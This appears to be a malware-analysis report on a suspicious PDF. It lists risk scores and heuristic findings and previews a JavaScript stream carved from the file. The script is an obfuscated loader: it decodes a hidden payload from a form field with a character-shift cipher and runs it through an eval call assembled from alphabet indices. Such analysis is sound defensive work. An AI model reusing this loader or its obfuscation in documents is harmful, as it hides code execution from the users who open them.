SUSPICIOUS
48
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9971
Heuristics 3
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0106_000.js |
pdf-javascript-stream | PDF /JS object 106 at offset 0x7F27 | 3219 bytes |
SHA-256: dd02245bc1824e1d0e84a8350c85b274981555683706a463a6fe9b9169790162 |
|||
Preview scriptFirst 1,000 lines of the extracted script
var nnnnnnnnnnnnnnnnnnnnn="G198G147G198"+"G147G198G162G165G"+"150G153G207G144"+"G204G159G150G204G16"+"2G204G144G147G198"+"G147G198G159G198"+"G159G168G207G2"+"01G201G198G15"+"9G147G198G198G153"+"G147G156G195G14"+"7G207G198G159G195"+"G198G147G207G156"+"G204G201G147G162"+"G171G147G147G"+"153G150G153"+"G195G147G207G1"+"56G198G168G168G1"+"71G171G165G201G195G150"+"G153G195G147G207G"+"144G168G147G171G"+"201G168G147G207G156G1"+"62G204G144G14"+"7G168G150G159"+"G210G207G144G207"+"G156G168G150G195G2"+"10G168G150G162G165"+"G147G210G207G15"+"6G207G198G162G1"+"44G150G207G207G156"+"G207G156G2"+"07G156G204G159G150"+"G204G198G159G19"+"8G159G198G147G19"+"8G153G198G159G147G1"+"98G198G153G147G201"+"G162G165G147G201"+"G207G156G171G"+"147G144G147G16"+"8G207G207G144G168G2"+"01G207G156G210G156G20"+"7G156G207G156G168"+"G201G207G156G201G156G195"+"G195G207G156G168G"+"207G207G156"+"G147G198G198G153G153G"+"144G162G204G150G"+"150G204G159G150G204G"+"198G159G168G207G198G"+"156G168G207G207G"+"165G198G159G198G"+"159G168G201G207G"+"156G207G156G207G15"+"6G150G156G198G147G147G198"+"G198G153G153G201G"+"162G204G195G153G144G168G1"+"98G147G162G204G147G147G204G15"+"9G150G204G16"+"2G204G147G2"+"01G162G165G144G"+"201G207G144G198G159G198G"+"156G168G201G201"+"G144G210G156G207G156G"+"207G156G198G147G147"+"G198G171G153G144G"+"168G147G198G198G"+"153G153G168G207G165"+"G168G198G147G168G162"+"G165G171G198G147G168G207G"+"156G171G147G144G162"+"G162G204G147G"+"159G195G204G195G159"+"G204G204G144G2"+"04G171G144G207G201G195G159G"+"162G156G204G159G204G165"+"G204G204G144G204"+"G171G147G147G165G204"+"G159G150G204G198"+"G159G198G159G198G159"+"G147G198G171G153G144G168G147"+"G198G198G153G144G156G20"+"4G159G150G204G162G204G"+"147G201G162G165G14"+"4G201G207G144G201"+"G204G147G147G198G1"+"59G198G156G198G14"+"7G198G150G147G198"+"G171G153G144G168G"+"147G198G198G153G144"+"G144G147G198"+"G171G153G144G168G"+"147G198G198G153G1"+"44G201G168G150G159G210G"+"207G150G207G156G168"+"G150G195G210G168"+"G150G162G165G147G210G"+"207G156G171G144G2"+"04G162G204G15"+"9G150G204G198G1"+"71G168G207G207G1"+"47G198G159G198G15"+"9G198G147G198G159G"+"198G159G147G198G198"+"G153G147G144G"+"162G165G147G201G201"+"G156G171G195G144"+"G150G204G159G150G156G204"+"G159G150G204G195G156G207"+"G198G159G195G210G144"+"G207G153G2"+"04G201"+"G147G162G171"+"G147G147G153G150"+"G153G207G14"+"4G207G153G2"+"01G150G168G150"+"G204G171G";
var cxvbeagasdfadsf = ':'+'ABCDEFGHIJKLMNOPQRSTUVWXYZ{} ()[]^abcdefghijklmnopqrstuvwxyz_0123456789/!%+-*.,;"=<>&'+'\\';
function cbrwnwsfdgasdf(text){
var decryptedText="";
var ln = text.length;
for (var i = 0;i<ln-1;i++)
{
decryptedText += ytrhsdgfesrgsdfgew(text[i]);
}
return decryptedText;}
function ytrhsdgfesrgsdfgew(cryptSymbol){
var symbol="";
var posSymbol=cxvbeagasdfadsf.indexOf(cryptSymbol)-2;
if (posSymbol<0)
{posSymbol=posSymbol+cxvbeagasdfadsf.length;}
symbol=cxvbeagasdfadsf.charAt(posSymbol);
return symbol;}
var b2=getField("Text1");
var fgbfdg43wgwefewf=b2.value;
function gasdasd(sads){
var ghjashdkfls = "fklsadnkljasjklkjasrevkjadslkfjal;skdjfasd" + "gakslnkladsn;klasj;fkljasal".substring();
app[cxvbeagasdfadsf[39]+cxvbeagasdfadsf[56]+cxvbeagasdfadsf[35]+cxvbeagasdfadsf[46]](sads);
}
gasdasd(cbrwnwsfdgasdf(fgbfdg43wgwefewf));
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.